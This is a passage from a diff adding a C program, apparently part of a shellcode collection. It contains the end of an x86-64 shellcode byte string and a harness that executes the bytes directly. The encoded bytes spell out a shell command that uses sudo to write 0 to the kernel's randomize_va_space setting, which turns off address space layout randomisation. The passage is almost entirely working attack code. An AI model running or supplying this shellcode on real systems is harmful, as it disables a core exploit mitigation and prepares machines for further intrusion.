+"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x36\x00" +"\x00\x00\x65\x63\x68\x6f\x20\x30\x20\x7c\x20\x73\x75\x64\x6f" +"\x20\x74\x65\x65\x20\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f" +"\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a" +"\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65\x00\x56\x57\x48\x89" +"\xe6\x0f\x05"; + +int main() +{ + printf("Shellcode len: %d\n", strlen(ASLR)); + + int (*ret)() = (int(*)())ASLR; + + ret(); + +} \ No newline at end of file